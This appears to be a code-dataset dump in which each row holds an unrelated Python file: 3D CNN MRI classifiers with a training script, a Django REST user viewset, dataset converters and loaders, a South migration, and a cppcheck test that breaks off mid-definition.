content stringlengths 5 1.05M |
|---|
class Solution:
    def twoSum(self, numbers: List[int], target: int) -> List[int]:
        """Return the 1-based indices of the two entries summing to `target`.

        Single pass with a complement map: time O(n), space O(n).
        Returns None (implicitly) when no pair exists.
        """
        seen = {}  # complement still needed -> index of the element waiting for it
        for idx, value in enumerate(numbers):
            if value in seen:
                return [seen[value] + 1, idx + 1]
            seen[target - value] = idx
        # Alternative when the input is sorted: two pointers, time O(n) space O(1)
        # lo, hi = 0, len(numbers) - 1
        # while lo < hi:
        #     total = numbers[lo] + numbers[hi]
        #     if total == target:
        #         return lo + 1, hi + 1
        #     if total < target:
        #         lo += 1
        #     else:
        #         hi -= 1
import random
def log_normal_value(sigma, mean):
    """Draw one latency sample from a Gaussian and round it to a whole float.

    NOTE(review): despite the name and original docstring, this samples
    ``random.gauss`` (a normal distribution, not a log-normal) — confirm
    which distribution was actually intended.

    :param sigma: standard deviation; larger values spread samples wider
    :param mean: centre of the distribution (the 50th percentile)
    :return: the rounded sample as a float
    """
    sample = random.gauss(mean, sigma)
    return float(round(sample))
def random_value(a, b):
    """Return a uniformly random integer drawn from [a, b], as a float.

    :param a: inclusive lower bound
    :param b: inclusive upper bound
    :return: the drawn value converted to float
    """
    drawn = random.randint(a, b)
    return float(drawn)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from os import path
import os
class ConvLBP(nn.Conv3d):
    """3D convolution whose weights are fixed random ternary values.

    Each weight is drawn as +/-1 by a fair coin, then zeroed with
    probability (1 - sparsity); the resulting tensor is frozen (no
    gradient). Always uses padding=1 and no bias.
    Source: https://github.com/dizcza/lbcnn.pytorch/
    """

    def __init__(self, in_channels, out_channels, kernel_size=3, sparsity=0.5):
        super().__init__(in_channels, out_channels, kernel_size, padding=1, bias=False)
        weight_param = next(self.parameters())
        # Fair coin per weight, mapped {0, 1} -> {-1, +1}.
        half = torch.FloatTensor(weight_param.data.shape).fill_(0.5)
        signs = torch.bernoulli(half) * 2 - 1
        # Zero out weights with probability (1 - sparsity), then freeze.
        inactive = torch.rand(half.shape) > sparsity
        signs.masked_fill_(inactive, 0)
        weight_param.data = signs
        weight_param.requires_grad = False
class DiagnosisClassifier(nn.Module):
    """3-conv / 6-FC network for a (by default binary) classification task.

    Expects a single-channel 3D volume; the flatten size (32*12*15*12)
    assumes the input resolution used throughout this file — confirm
    against the dataset before reuse.
    """

    def __init__(self, n_classes=2):
        super(DiagnosisClassifier, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)  # halves every spatial dimension
        self.conv1 = nn.Conv3d(1, 6, 4)
        self.conv2 = nn.Conv3d(6, 16, 4)
        self.conv3 = nn.Conv3d(16, 32, 5)
        self.fc1 = nn.Linear(32 * 12 * 15 * 12, 10000)
        self.fc2 = nn.Linear(10000, 5000)
        self.fc3 = nn.Linear(5000, 1000)
        self.fc4 = nn.Linear(1000, 200)
        self.fc5 = nn.Linear(200, 60)
        self.fc6 = nn.Linear(60, n_classes)

    def forward(self, x, train=False):
        """Return raw class scores (logits); `train` is accepted but unused."""
        out = x
        for conv in (self.conv1, self.conv2, self.conv3):
            out = self.pool(F.relu(conv(out)))
        out = out.view(-1, 32 * 12 * 15 * 12)
        for fc in (self.fc1, self.fc2, self.fc3, self.fc4, self.fc5):
            out = F.relu(fc(out))
        return self.fc6(out)
class BasicGPUClassifier(nn.Module):
    """4-conv / 5-FC classifier with dropout before each FC layer.

    Dropout is only applied when ``forward`` is called with ``train=True``
    (manual flag rather than ``nn.Module.training``). The ``bids``
    constructor flag is accepted but unused — kept for caller
    compatibility.
    """

    def __init__(self, dropout=0.1, n_classes=2, bids=False):
        super(BasicGPUClassifier, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)  # plain subsampling
        self.pool2 = nn.MaxPool3d(2, 2, padding=1)  # padded variant for the last stage
        self.conv1 = nn.Conv3d(1, 8, 4)
        self.conv2 = nn.Conv3d(8, 16, 4)
        self.conv3 = nn.Conv3d(16, 32, 5)
        self.conv4 = nn.Conv3d(32, 64, 4)
        self.fc1 = nn.Linear(64 * 5 * 7 * 5, 5000)
        self.fc2 = nn.Linear(5000, 1000)
        self.fc3 = nn.Linear(1000, 200)
        self.fc4 = nn.Linear(200, 60)
        self.fc5 = nn.Linear(60, n_classes)
        self.dropout = nn.Dropout(p=dropout)

    def forward(self, x, train=False):
        """Return logits; dropout fires before every FC layer when train=True."""
        out = x
        for conv in (self.conv1, self.conv2, self.conv3):
            out = self.pool(F.relu(conv(out)))
        out = self.pool2(F.relu(self.conv4(out)))
        out = out.view(-1, 64 * 5 * 7 * 5)
        for fc in (self.fc1, self.fc2, self.fc3, self.fc4):
            if train:
                out = self.dropout(out)
            out = F.relu(fc(out))
        if train:
            out = self.dropout(out)
        return self.fc5(out)
class SimonyanClassifier(nn.Module):
    """VGG-inspired (Simonyan-style) 6-conv / 5-FC classifier.

    All pools are padded MaxPool3d(2, 2, padding=1); the flatten size
    (64*6*7*6) assumes the input resolution used throughout this file.
    """

    def __init__(self, n_classes=2):
        super(SimonyanClassifier, self).__init__()
        self.pool = nn.MaxPool3d(2, 2, padding=1)  # padded subsampling
        self.conv1 = nn.Conv3d(1, 8, 3)
        self.conv2 = nn.Conv3d(8, 16, 3)
        self.conv3 = nn.Conv3d(16, 32, 3)
        self.conv4 = nn.Conv3d(32, 32, 3)
        self.conv5 = nn.Conv3d(32, 64, 3)
        self.conv6 = nn.Conv3d(64, 64, 3)
        self.fc1 = nn.Linear(64 * 6 * 7 * 6, 5000)
        self.fc2 = nn.Linear(5000, 1000)
        self.fc3 = nn.Linear(1000, 200)
        self.fc4 = nn.Linear(200, 60)
        self.fc5 = nn.Linear(60, n_classes)

    def forward(self, x, train=False):
        """Return logits; `train` is accepted but unused."""
        out = self.pool(F.relu(self.conv1(x)))
        out = self.pool(F.relu(self.conv2(out)))
        out = F.relu(self.conv3(out))
        out = self.pool(F.relu(self.conv4(out)))
        out = F.relu(self.conv5(out))
        out = self.pool(F.relu(self.conv6(out)))
        out = out.view(-1, 64 * 6 * 7 * 6)
        for fc in (self.fc1, self.fc2, self.fc3, self.fc4):
            out = F.relu(fc(out))
        return self.fc5(out)
class SimpleClassifier(nn.Module):
    """6-conv / 5-FC classifier arranged as three conv-conv-pool stages."""

    def __init__(self, n_classes=2):
        super(SimpleClassifier, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)  # Subsampling
        self.conv1 = nn.Conv3d(1, 8, 4)
        self.conv2 = nn.Conv3d(8, 8, 5)
        self.conv3 = nn.Conv3d(8, 16, 4)
        self.conv4 = nn.Conv3d(16, 16, 5)
        self.conv5 = nn.Conv3d(16, 32, 4)
        self.conv6 = nn.Conv3d(32, 32, 5)
        self.fc1 = nn.Linear(32 * 9 * 12 * 9, 5000)
        self.fc2 = nn.Linear(5000, 800)
        self.fc3 = nn.Linear(800, 100)
        self.fc4 = nn.Linear(100, 10)
        self.fc5 = nn.Linear(10, n_classes)

    def forward(self, x, train=False):
        """Return logits; `train` is accepted but unused."""
        out = x
        # Three stages of conv -> conv -> pool, all ReLU-activated.
        for first, second in ((self.conv1, self.conv2),
                              (self.conv3, self.conv4),
                              (self.conv5, self.conv6)):
            out = F.relu(first(out))
            out = self.pool(F.relu(second(out)))
        out = out.view(-1, 32 * 9 * 12 * 9)
        for fc in (self.fc1, self.fc2, self.fc3, self.fc4):
            out = F.relu(fc(out))
        return self.fc5(out)
class SimpleLBP(nn.Module):
    """SimpleClassifier variant whose odd conv layers use fixed LBP weights.

    Warning: ConvLBP layers automatically apply padding=1, which is why
    the flatten size (32*10*13*10) differs from SimpleClassifier's.
    """

    def __init__(self, n_classes=2):
        super(SimpleLBP, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)  # Subsampling
        self.conv1 = ConvLBP(1, 8, 4)
        self.conv2 = nn.Conv3d(8, 8, 5)
        self.conv3 = ConvLBP(8, 16, 4)
        self.conv4 = nn.Conv3d(16, 16, 5)
        self.conv5 = ConvLBP(16, 32, 4)
        self.conv6 = nn.Conv3d(32, 32, 5)
        self.fc1 = nn.Linear(32 * 10 * 13 * 10, 5000)
        self.fc2 = nn.Linear(5000, 800)
        self.fc3 = nn.Linear(800, 100)
        self.fc4 = nn.Linear(100, 10)
        self.fc5 = nn.Linear(10, n_classes)

    def forward(self, x, train=False):
        """Return logits; `train` is accepted but unused."""
        out = x
        for first, second in ((self.conv1, self.conv2),
                              (self.conv3, self.conv4),
                              (self.conv5, self.conv6)):
            out = F.relu(first(out))
            out = self.pool(F.relu(second(out)))
        out = out.view(-1, 32 * 10 * 13 * 10)
        for fc in (self.fc1, self.fc2, self.fc3, self.fc4):
            out = F.relu(fc(out))
        return self.fc5(out)
class SimpleLBCNN(nn.Module):
    """LBCNN-style classifier: fixed-weight LBP convs followed by learned 1x1 convs."""

    def __init__(self, n_classes=2):
        super(SimpleLBCNN, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)  # Subsampling
        self.conv1 = ConvLBP(1, 8, 6)
        self.conv2 = nn.Conv3d(8, 8, 5)
        self.conv3 = ConvLBP(8, 32, 6)
        self.conv3_1 = nn.Conv3d(32, 16, 1)
        self.conv4 = ConvLBP(16, 32, 5)
        self.conv4_1 = nn.Conv3d(32, 16, 1)
        self.conv5 = ConvLBP(16, 32, 6)
        self.conv5_1 = nn.Conv3d(32, 32, 1)
        self.conv6 = ConvLBP(32, 32, 5)
        self.conv6_1 = nn.Conv3d(32, 32, 1)
        self.fc1 = nn.Linear(32 * 10 * 13 * 10, 5000)
        self.fc2 = nn.Linear(5000, 800)
        self.fc3 = nn.Linear(800, 100)
        self.fc4 = nn.Linear(100, 10)
        self.fc5 = nn.Linear(10, n_classes)

    def forward(self, x, train=False):
        """Return logits; `train` is accepted but unused."""
        out = F.relu(self.conv1(x))
        out = self.pool(F.relu(self.conv2(out)))
        # Each fixed LBP conv is followed by a learned 1x1 mixing conv.
        for lbp, mix in ((self.conv3, self.conv3_1), (self.conv4, self.conv4_1)):
            out = mix(F.relu(lbp(out)))
        out = self.pool(out)
        for lbp, mix in ((self.conv5, self.conv5_1), (self.conv6, self.conv6_1)):
            out = mix(F.relu(lbp(out)))
        out = self.pool(out)
        out = out.view(-1, 32 * 10 * 13 * 10)
        for fc in (self.fc1, self.fc2, self.fc3, self.fc4):
            out = F.relu(fc(out))
        return self.fc5(out)
class LocalBriefNet(nn.Module):
    """Small fully-convolutional classifier with one shared 3x3 conv block."""

    def __init__(self, n_classes=2):
        super(LocalBriefNet, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)
        self.conv5x5 = nn.Conv3d(1, 32, 5)
        self.conv3x3 = nn.Conv3d(32, 32, 3)
        self.last_conv = nn.Conv3d(32, 2, 3)
        self.fc = nn.Linear(2 * 24 * 30 * 24, n_classes)

    def forward(self, x, train=False):
        """Return logits; `train` is accepted but unused."""
        out = self.pool(F.relu(self.conv5x5(x)))
        # The same 3x3 conv module is applied three times (shared weights).
        for _ in range(3):
            out = F.relu(self.conv3x3(out))
        out = self.pool(out)
        out = F.relu(self.last_conv(out))
        out = out.view(-1, 2 * 24 * 30 * 24)
        return self.fc(out)
class LocalBriefNet2(nn.Module):
    """LocalBriefNet variant with an extra 3x3 conv before the first pool."""

    def __init__(self, n_classes=2):
        super(LocalBriefNet2, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)
        self.conv5x5 = nn.Conv3d(1, 32, 5)
        self.conv3x3 = nn.Conv3d(32, 32, 3)
        self.last_conv = nn.Conv3d(32, 2, 3)
        self.fc = nn.Linear(2 * 23 * 29 * 23, n_classes)

    def forward(self, x, train=False):
        """Return logits; `train` is accepted but unused."""
        out = F.relu(self.conv5x5(x))
        out = self.pool(F.relu(self.conv3x3(out)))
        # The same 3x3 conv module is applied three more times (shared weights).
        for _ in range(3):
            out = F.relu(self.conv3x3(out))
        out = self.pool(out)
        out = F.relu(self.last_conv(out))
        out = out.view(-1, 2 * 23 * 29 * 23)
        return self.fc(out)
class LocalBriefNet3(nn.Module):
    """LocalBriefNet variant with one fewer shared 3x3 conv application."""

    def __init__(self, n_classes=2):
        super(LocalBriefNet3, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)
        self.conv5x5 = nn.Conv3d(1, 32, 5)
        self.conv3x3 = nn.Conv3d(32, 32, 3)
        self.last_conv = nn.Conv3d(32, 2, 3)
        self.fc = nn.Linear(2 * 24 * 30 * 24, n_classes)

    def forward(self, x, train=False):
        """Return logits; `train` is accepted but unused."""
        out = F.relu(self.conv5x5(x))
        out = self.pool(F.relu(self.conv3x3(out)))
        # The same 3x3 conv module is applied twice more (shared weights).
        for _ in range(2):
            out = F.relu(self.conv3x3(out))
        out = self.pool(out)
        out = F.relu(self.last_conv(out))
        out = out.view(-1, 2 * 24 * 30 * 24)
        return self.fc(out)
class VGG(nn.Module):
    """VGG-style padded-conv classifier ending in a 1x1 channel-reduction conv."""

    def __init__(self, n_classes=2):
        super(VGG, self).__init__()
        self.pool = nn.MaxPool3d(2, 2)
        self.conv1 = nn.Conv3d(1, 32, 3, padding=1)
        self.conv2 = nn.Conv3d(32, 64, 3, padding=1)
        self.conv3 = nn.Conv3d(64, 128, 3, padding=1)
        self.conv4 = nn.Conv3d(128, 128, 3, padding=1)
        self.conv5 = nn.Conv3d(128, 256, 3, padding=1)
        self.conv6 = nn.Conv3d(256, 256, 3, padding=1)
        self.conv7 = nn.Conv3d(256, 32, 1)
        self.fc1 = nn.Linear(32 * 3 * 4 * 3, 100)
        self.fc2 = nn.Linear(100, n_classes)

    def forward(self, x, train=False):
        """Return logits; `train` is accepted but unused."""
        out = self.pool(F.relu(self.conv1(x)))
        out = self.pool(F.relu(self.conv2(out)))
        out = F.relu(self.conv3(out))
        out = self.pool(F.relu(self.conv4(out)))
        out = F.relu(self.conv5(out))
        out = self.pool(F.relu(self.conv6(out)))
        # NOTE(review): conv6 is applied twice more below, sharing one set of
        # weights; a standard VGG would use distinct layers — confirm intent.
        out = F.relu(self.conv6(out))
        out = self.pool(F.relu(self.conv6(out)))
        out = F.relu(self.conv7(out))
        out = out.view(-1, 32 * 3 * 4 * 3)
        out = F.relu(self.fc1(out))
        return self.fc2(out)
if __name__ == '__main__':
    # Script entry point: parse CLI options, build the dataset and the
    # selected classifier, then launch cross-validated training.
    from data_loader import MriBrainDataset, BidsMriBrainDataset, ToTensor, GaussianSmoothing
    from training_functions import cross_validation
    import torchvision
    import argparse
    parser = argparse.ArgumentParser()
    # Mandatory arguments
    parser.add_argument("train_path", type=str,
                        help='path to your list of subjects for training')
    parser.add_argument("results_path", type=str,
                        help="where the outputs are stored")
    parser.add_argument("caps_path", type=str,
                        help="path to your caps folder")
    # Network structure
    parser.add_argument("--classifier", type=str, default='basic',
                        help='classifier selected')
    parser.add_argument('--n_classes', type=int, default=2,
                        help='Number of classes in the dataset')
    # Dataset management
    parser.add_argument('--bids', action='store_true', default=False)
    parser.add_argument('--sigma', type=float, default=0,
                        help='Size of the Gaussian smoothing kernel (preprocessing)')
    parser.add_argument('--rescale', type=str, default='crop',
                        help='Action to rescale the BIDS without deforming the images')
    # Training arguments
    parser.add_argument("-e", "--epochs", type=int, default=2,
                        help="number of loops on the whole dataset")
    parser.add_argument('-lr', '--learning_rate', type=float, default=1,
                        help='the learning rate of the optimizer (*0.00005)')
    parser.add_argument('-cv', '--cross_validation', type=int, default=10,
                        help='cross validation parameter')
    parser.add_argument('--dropout', '-d', type=float, default=0.5,
                        help='Dropout rate before FC layers')
    parser.add_argument('--batch_size', '-batch', type=int, default=4,
                        help="The size of the batches to train the network")
    # Managing output
    parser.add_argument("-n", "--name", type=str, default='network',
                        help="name given to the outputs and checkpoints of the parameters")
    parser.add_argument("-save", "--save_interval", type=int, default=1,
                        help="the number of epochs done between the tests and saving")
    # Managing device
    parser.add_argument('--gpu', action='store_true', default=False,
                        help='Uses gpu instead of cpu if cuda is available')
    parser.add_argument('--on_cluster', action='store_true', default=False,
                        help='to work on the cluster of the ICM')
    args = parser.parse_args()
    # Select the compute device; --gpu only takes effect when CUDA is present.
    if args.gpu and torch.cuda.is_available():
        device = torch.device('cuda')
    else:
        device = torch.device('cpu')
    # The CLI value is a multiplier on a 5e-5 base learning rate.
    lr = args.learning_rate * 0.00005
    # All outputs go into a per-run folder named after --name.
    results_path = path.join(args.results_path, args.name)
    if not path.exists(results_path):
        os.makedirs(results_path)
    # Preprocessing pipeline: Gaussian smoothing, then tensor conversion.
    composed = torchvision.transforms.Compose([GaussianSmoothing(sigma=args.sigma), ToTensor(gpu=args.gpu)])
    if args.bids:
        trainset = BidsMriBrainDataset(args.train_path, args.caps_path, classes=args.n_classes,
                                       transform=composed, rescale=args.rescale)
    else:
        trainset = MriBrainDataset(args.train_path, args.caps_path, classes=args.n_classes,
                                   transform=composed, on_cluster=args.on_cluster)
    # Instantiate the network selected by --classifier and move it to `device`.
    if args.classifier == 'basic':
        classifier = DiagnosisClassifier(n_classes=args.n_classes).to(device=device)
    elif args.classifier == 'simonyan':
        classifier = SimonyanClassifier(n_classes=args.n_classes).to(device=device)
    elif args.classifier == 'simple':
        classifier = SimpleClassifier(n_classes=args.n_classes).to(device=device)
    elif args.classifier == 'basicgpu':
        classifier = BasicGPUClassifier(n_classes=args.n_classes, dropout=args.dropout).to(device=device)
    elif args.classifier == 'simpleLBP':
        classifier = SimpleLBP(n_classes=args.n_classes).to(device=device)
    elif args.classifier == 'simpleLBCNN':
        classifier = SimpleLBCNN(n_classes=args.n_classes).to(device=device)
    elif args.classifier == 'localbriefnet':
        classifier = LocalBriefNet(n_classes=args.n_classes).to(device=device)
    elif args.classifier == 'localbriefnet2':
        classifier = LocalBriefNet2(n_classes=args.n_classes).to(device=device)
    elif args.classifier == 'localbriefnet3':
        classifier = LocalBriefNet3(n_classes=args.n_classes).to(device=device)
    elif args.classifier == 'vgg':
        classifier = VGG(n_classes=args.n_classes).to(device=device)
    else:
        raise ValueError('Unknown classifier')
    # Initialization
    # classifier.apply(weights_init)
    # Training
    best_params = cross_validation(classifier, trainset, batch_size=args.batch_size, folds=args.cross_validation,
                                   epochs=args.epochs, results_path=results_path, model_name=args.name,
                                   save_interval=args.save_interval, gpu=args.gpu, lr=lr)
|
import logging
from django.utils.translation import gettext_lazy as _
from rest_framework import status
from rest_framework import viewsets
from rest_framework.exceptions import NotFound
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.response import Response
from service import constants
from service.utils import response
from .models import User
from .serializers import UserSerializer
class UserViewSet(viewsets.ModelViewSet):
    """
    Retrieve, create, list, update or delete user instances.

    Every handler logs a machine-parseable ``type=... msg=...`` line on
    entry, success and failure. Log arguments are passed lazily (the
    logging module formats them only when the record is actually emitted)
    instead of eagerly with ``%``.
    """
    queryset = User.objects.all()
    serializer_class = UserSerializer
    permission_classes = []  # NOTE(review): no permission checks — confirm this endpoint is meant to be open
    pagination_class = LimitOffsetPagination

    def create(self, request, *args, **kwargs):
        """
        Create a user model instance.
        :param request: incoming request whose ``data`` feeds the serializer
        :param args:
        :param kwargs:
        :return: 201 with the serialized user, or 400 with validation errors
        """
        logging.info('type=%s msg=%s', constants.USER_CREATE_API_INIT, 'user create API initiated')
        serializer = self.get_serializer(data=request.data)
        if serializer.is_valid(raise_exception=False):
            self.perform_create(serializer)
            logging.info('type=%s msg=%s', constants.USER_CREATE_API_SUCCESS, 'User created successfully')
            headers = self.get_success_headers(serializer.data)
            return response(data=serializer.data, status=status.HTTP_201_CREATED, headers=headers)
        logging.error('type=%s msg=%s', constants.USER_CREATE_API_ERROR, 'Validation error in user create request')
        return response(errors=serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def list(self, request, *args, **kwargs):
        """
        List a user queryset.
        :param request:
        :param args:
        :param kwargs:
        :return: 200 with the (possibly paginated) serialized users
        """
        logging.info('type=%s msg=%s', constants.USER_LIST_API_INIT, 'User list API initiated')
        queryset = self.filter_queryset(self.get_queryset())
        page = self.paginate_queryset(queryset)
        if page is not None:
            logging.debug('type=%s msg=%s', constants.USER_LIST_API_WITH_PAGINATION, 'User list with pagination')
            serializer = self.get_serializer(page, many=True)
            page_data = self.get_paginated_response(serializer.data)
            logging.info('type=%s msg=%s', constants.USER_LIST_API_SUCCESS, 'User list fetched successfully')
            return response(data=page_data.data)
        logging.debug('type=%s msg=%s', constants.USER_LIST_API_WITHOUT_PAGINATION, 'User list without pagination')
        serializer = self.get_serializer(queryset, many=True)
        logging.info('type=%s msg=%s', constants.USER_LIST_API_SUCCESS, 'User list fetched successfully')
        return response(data=serializer.data)

    def __get_object(self):
        """
        Retrieve the user instance addressed by the URL's lookup field.
        :return: the ``User`` instance
        :raises NotFound: when no user matches the primary key
        """
        try:
            return User.objects.get(pk=self.kwargs.get(self.lookup_field))
        except User.DoesNotExist:
            logging.error('type=%s msg=%s', constants.USER_NOT_FOUND, 'User does not exist')
            raise NotFound(_('User does not exist'))

    def retrieve(self, request, *args, **kwargs):
        """
        Retrieve a user model instance.
        :param request:
        :param args:
        :param kwargs:
        :return: 200 with the serialized user
        """
        logging.info('type=%s msg=%s', constants.USER_RETRIEVE_API_INIT, 'User retrieve API initiated')
        instance = self.__get_object()
        serializer = self.get_serializer(instance)
        logging.info('type=%s msg=%s', constants.USER_RETRIEVE_API_SUCCESS, 'User detail retrieved successfully')
        return response(data=serializer.data)

    def update(self, request, *args, **kwargs):
        """
        Update a user model instance (full or partial).
        :param request:
        :param args:
        :param kwargs: ``partial=True`` switches to partial-update semantics
        :return: 200 with the updated user, or 400 with validation errors
        """
        logging.info('type=%s msg=%s', constants.USER_UPDATE_API_INIT, 'User update API initiated')
        partial = kwargs.pop('partial', False)
        logging.debug('type=%s msg=%s data=%s',
                      constants.USER_UPDATE_API_IS_PARTIAL, 'User request is for with or without partial update',
                      {'is_partial': partial})
        instance = self.__get_object()
        serializer = self.get_serializer(instance, data=request.data, partial=partial)
        if serializer.is_valid(raise_exception=False):
            self.perform_update(serializer)
            logging.info('type=%s msg=%s', constants.USER_UPDATE_API_SUCCESS, 'User updated successfully')
            return response(data=serializer.data)
        logging.error('type=%s msg=%s', constants.USER_UPDATE_API_ERROR, 'Validation error in user update request')
        return response(errors=serializer.errors, status=status.HTTP_400_BAD_REQUEST)

    def partial_update(self, request, *args, **kwargs):
        """
        Partial update a user model instance (delegates to ``update``).
        :param request:
        :param args:
        :param kwargs:
        :return: the ``update`` response
        """
        logging.info('type=%s msg=%s', constants.USER_PARTIAL_UPDATE_API_INIT, 'User partial update API initiated')
        kwargs['partial'] = True
        return self.update(request, *args, **kwargs)

    def destroy(self, request, *args, **kwargs):
        """
        Destroy a user model instance.
        :param request:
        :param args:
        :param kwargs:
        :return: 204 with no content
        """
        logging.info('type=%s msg=%s', constants.USER_DESTROY_API_INIT, 'User destroy API initiated')
        instance = self.__get_object()
        self.perform_destroy(instance)
        logging.info('type=%s msg=%s', constants.USER_DESTROY_API_SUCCESS, 'User deleted successfully')
        return Response(status=status.HTTP_204_NO_CONTENT)
|
import os
import json
from .convert_dataset import convert_dataset
def convert_maestro(input_path, output_path):
    """Convert the MAESTRO v1 dataset, producing one converted set per split.

    Reads ``maestro-v1.0.0.json`` under ``input_path`` and, for each of the
    train/validation/test splits, forwards the matching sample names and
    audio/MIDI paths to ``convert_dataset``.
    """
    info_filename = os.path.join(input_path, "maestro-v1.0.0.json")
    with open(info_filename) as file:
        info = json.load(file)
    for split in ["train", "validation", "test"]:
        # Filter once per split instead of once per field.
        samples = [sample for sample in info if sample["split"] == split]
        # Name = audio path minus its first 5 chars and the ".wav" suffix
        # (assumes paths like "YYYY/<name>.wav" — TODO confirm).
        names = [sample["audio_filename"][5:-4] for sample in samples]
        wav_filenames = [os.path.join(input_path, sample["audio_filename"])
                         for sample in samples]
        midi_filenames = [os.path.join(input_path, sample["midi_filename"])
                          for sample in samples]
        convert_dataset(
            os.path.join(output_path, split), names, wav_filenames, midi_filenames,
        )
|
# Path of the centrelines export read by every helper below. Each function
# now opens its own handle: the original module-level `file = open(...)`
# shadowed the `file` builtin name, was never closed, and — being a shared
# iterator — was exhausted after the first function call, so any second
# call silently saw no rows.
CENTRELINES_CSV = 'Street_Centrelines.csv'


def tupls():
    """Print (STR_NAME, FULL_NAME, FROM_STR, TO_STR) for every row."""
    with open(CENTRELINES_CSV) as handle:
        for line in handle:
            fields = line.split(',')
            record = (fields[2], fields[3], fields[6], fields[7])
            print("tuple of STR_NAME,FULL_NAME,FROM_STR,TO_STR is:", record)


def dictionary():
    """Print a per-row dict built from fields 12 and 0.

    NOTE(review): ``zip(fields[12], fields[0])`` pairs the *characters* of
    the two fields, which is almost certainly not the intent — probably
    should be ``{fields[12]: fields[0]}``. Behavior kept pending confirmation.
    """
    with open(CENTRELINES_CSV) as handle:
        for line in handle:
            fields = line.split(',')
            print(dict(zip(fields[12], fields[0])))


def uOwners():
    """Print field 11 (presumably the owner column — verify) of every row."""
    with open(CENTRELINES_CSV) as handle:
        for line in handle:
            fields = line.split(',')
            print(fields[11])


def stClass():
    """Print each row whose field 10 is exactly 'ARTERIAL'.

    Bug fix: the original called ``line.join()`` on a list (lists have no
    ``join``), raising AttributeError on the first match; the fields are
    now joined back into the CSV line instead.
    """
    with open(CENTRELINES_CSV) as handle:
        for line in handle:
            fields = line.split(',')
            if fields[10] == 'ARTERIAL':
                print(','.join(fields))


if __name__ == '__main__':
    # Guarded so importing this module no longer triggers I/O and printing.
    stClass()
|
import os
import pandas as pd
from torchvision.datasets import ImageFolder
class Imagenette(ImageFolder):
    """ImageFolder over one Imagenette split, relabelled from a noisy-label CSV.

    After the normal folder scan, the class list, class-to-index mapping and
    sample list are all rebuilt from the ``noisy_labels_0`` column of the CSV.
    """

    def __init__(self, root, subset='train', csv="noisy_imagenette.csv", **kwargs):
        super().__init__(os.path.join(root, subset), **kwargs)
        frame = pd.read_csv(os.path.join(root, csv))
        # Replace the folder-derived classes with the CSV's label set.
        self.classes = list(set(frame.noisy_labels_0))
        self.class_to_idx = {label: index for index, label in enumerate(self.classes)}
        self.imgs = self.get_imgs(root, frame)

    def get_imgs(self, root, ds):
        """Return (absolute path, class index) pairs, one per CSV row."""
        pairs = []
        for rel_path, label in zip(ds.path, ds.noisy_labels_0):
            pairs.append((os.path.join(root, rel_path), self.class_to_idx[label]))
        return pairs
|
from logging import info
import cv2
import numpy as np
import matplotlib.pyplot as plt
from .TabDetectDewarp import detect_bbox, get_dewarped_table
def detect_line(im):
    '''
    Locate the labelled text-line bounding boxes on an input image.

    Args:
        im (np.array): input image
    Returns:
        dict: maps field names ('address_line_1', 'address_line_2',
        'birthday', 'hometown_line_1', 'hometown_line_2', 'id', 'name',
        'nation', 'sex') to [left, top, right, bottom] boxes.
    '''
    # Delegates entirely to the table-detection helper. The local result is
    # renamed so it no longer shadows `info` imported from logging above.
    boxes = detect_bbox(im)
    return boxes
if __name__ == '__main__':
    # Smoke-test entry point: the image path is left empty and must be filled
    # in before running (cv2.imread('') returns None).
    im = cv2.imread('')
    info = detect_line(im)
    print(info)
# -*- coding: utf-8 -*-
from south.db import db
from south.v2 import SchemaMigration
class Migration(SchemaMigration):
    """Rename the ``key_value.system_id`` column to ``obj_id`` (and back)."""

    def forwards(self, orm):
        # Guard clause: nothing to rename during a dry run.
        if db.dry_run:
            return
        db.rename_column('key_value', 'system_id', 'obj_id')

    def backwards(self, orm):
        if db.dry_run:
            return
        db.rename_column('key_value', 'obj_id', 'system_id')
|
import numpy as np
def load_csv_test_data(filename):
    """Read a comma-separated file and return its rows as lists of strings.

    :param filename: path of the file to read
    :return: one list of string cells per line
    """
    with open(filename, 'r') as input_file:
        # str.split already returns a list; the previous wrapping
        # comprehension was a redundant copy.
        return [line.strip().split(',') for line in input_file]
def load_csv_data(filename: str) -> list:
    """Read an integer CSV file and return its rows as lists of ints.

    The '.csv' suffix is appended when missing.

    :param filename: path, with or without the '.csv' extension
    :return: one list of ints per line (a plain list — the previous
        ``np.ndarray`` return annotation was incorrect)
    """
    if not filename.endswith('.csv'):
        filename += '.csv'
    with open(filename, 'r') as input_file:
        return [[int(item) for item in line.strip().split(',')]
                for line in input_file]
def load_set_data(filename: str) -> np.ndarray:
    """Read a CSV file of integer sets, one set per line.

    Blank lines become empty entries. NOTE(review): when the rows have
    differing lengths the final ``np.array`` call builds a ragged array,
    which recent NumPy versions reject unless ``dtype=object`` is given —
    confirm the inputs are rectangular or pin the dtype.

    :param filename: path of the file to read
    :return: array with one entry per line
    """
    with open(filename, 'r') as input_file:
        rows = []
        for raw_line in input_file:
            stripped = raw_line.strip()
            if stripped:
                rows.append(np.array([int(token) for token in stripped.split(',')]))
            else:
                rows.append([])
        return np.array(rows)
|
## @file
## `metaL`: homoiconic interpreter engine
## (c) Dmitry Ponyatov <<dponyatov@gmail.com>> 2020 MIT
## * homoiconic interpreter engine
## * in-memory object graph database
## * interactive programming system
from .core import *
from .geo import *
from .gui import *
from .web import *
|
"""Machine Learning Detection metrics for single table datasets."""
from sdmetrics.single_table.detection.sklearn import LogisticDetection, SVCDetection
__all__ = [
'LogisticDetection',
'SVCDetection'
]
|
# Run with nosetests tests/test_cppcheck.py:test_cppcheck
from debile.slave.runners.cppcheck import cppcheck, version
from debile.slave.wrappers.cppcheck import parse_cppcheck
from firehose.model import (Analysis, Generator, Metadata)
import lxml.etree
import unittest
import mock
class CppcheckTestCase(unittest.TestCase):
    """Tests for the cppcheck runner and its firehose wrapper.

    ``assertEquals`` (a deprecated alias removed in Python 3.12) is replaced
    by ``assertEqual``, and the mock parameters are renamed so they no
    longer shadow the ``mock`` module itself.
    """

    # .dsc fixture the non-mocked tests build and analyse with real cppcheck.
    file_path = "tests/resources/libjsoncpp_0.6.0~rc2-3.1.dsc"
    firehose_results = Analysis(
